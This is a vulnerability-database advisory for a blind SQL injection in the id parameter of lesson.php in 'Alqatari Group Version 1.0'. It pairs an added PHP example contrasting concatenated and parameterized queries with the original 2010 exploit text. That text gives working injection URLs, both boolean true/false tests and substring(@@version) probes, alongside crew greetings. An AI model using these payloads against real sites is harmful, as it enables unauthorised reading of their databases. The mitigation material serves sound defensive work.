Vendor: Alqatari Group Version 1.0
By: Red-D3v1L
CVSS: 7.5 (HIGH)
Vulnerability: Blind SQL Injection
CWE: 89
Product Name: Alqatari Group Version 1.0
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:alqatari_group:alqatari_group_version_1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Alqatari group Version 1.0 Blind SQL Injection Vulnerability

Alqatari Group Version 1.0 is vulnerable to blind SQL injection through the id parameter of lesson.php. SQL appended to the parameter value is executed by the server. No query output is returned directly, but the response differs depending on whether the injected condition evaluates to true or false, which lets an attacker test conditions one at a time. For example, a request with 'id=246 and 1=1' returns the true response and 'id=246 and 1=2' returns the false response.

Mitigation:

Input validation and parameterized queries can be used to mitigate this vulnerability.
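
The mitigation above as an added example, not code from the vendor or the advisory: a concatenated query beside a validated, parameterized one, run against the two request values quoted on this page. The lessons table, its columns, the function names and the in-memory SQLite database are assumptions made so the example runs stand-alone; the application's real schema is not shown on this page.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database (in-memory SQLite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE lessons (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO lessons VALUES (246, 'Sample lesson')");

// Vulnerable pattern (assumed): the raw parameter becomes part of the SQL text,
// so a boolean appended to it decides whether a row comes back.
function lessonVulnerable(PDO $pdo, string $rawId): ?array
{
    $row = $pdo->query("SELECT id, title FROM lessons WHERE id = $rawId")
               ->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function lessonHardened(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // rejected before any SQL is built
    }
    $stmt = $pdo->prepare('SELECT id, title FROM lessons WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// The two request values quoted in the advisory, plus a legitimate one.
foreach (['246', '246 and 1=1', '246 and 1=2'] as $input) {
    printf(
        "%-12s vulnerable=%-5s hardened=%s\n",
        $input,
        lessonVulnerable($pdo, $input) ? 'row' : 'none',
        lessonHardened($pdo, $input) ? 'row' : 'none'
    );
}
```

With the concatenated query the two injected values produce different results, which is the true/false signal the advisory relies on; the hardened function rejects both identically, so the response no longer depends on the appended condition.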

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _          
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_1_0 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
 
    [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
    [?] Alqatari group Version 1.0 Blind SQL Injection Vulnerability
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] For Ask:              [r-d@passport.com]
    [?] Script:               [ Alqatari group Version 1.0 ]
    [?] Language:             [ PHP ]
    [?] Founder:              [ Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] n00bz :               [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..]
########################################################################
   
===[ Exploit SQL Blind ]===

   
[»]Exploit : 

http://server/lesson.php?id=246%20and%201=1 << this true

http://server/lesson.php?id=246%20and%201=2 << this false


http://server/lesson.php?id=246%20and%20substring%28@@version,1,1%29=5 << this true

http://server/lesson.php?id=246%20and%20substring%28@@version,1,1%29=4 << this false


./Greetz For All my Friends 


 
==============================================================================
 
#sEc-r1z.com Str1kEz y0u !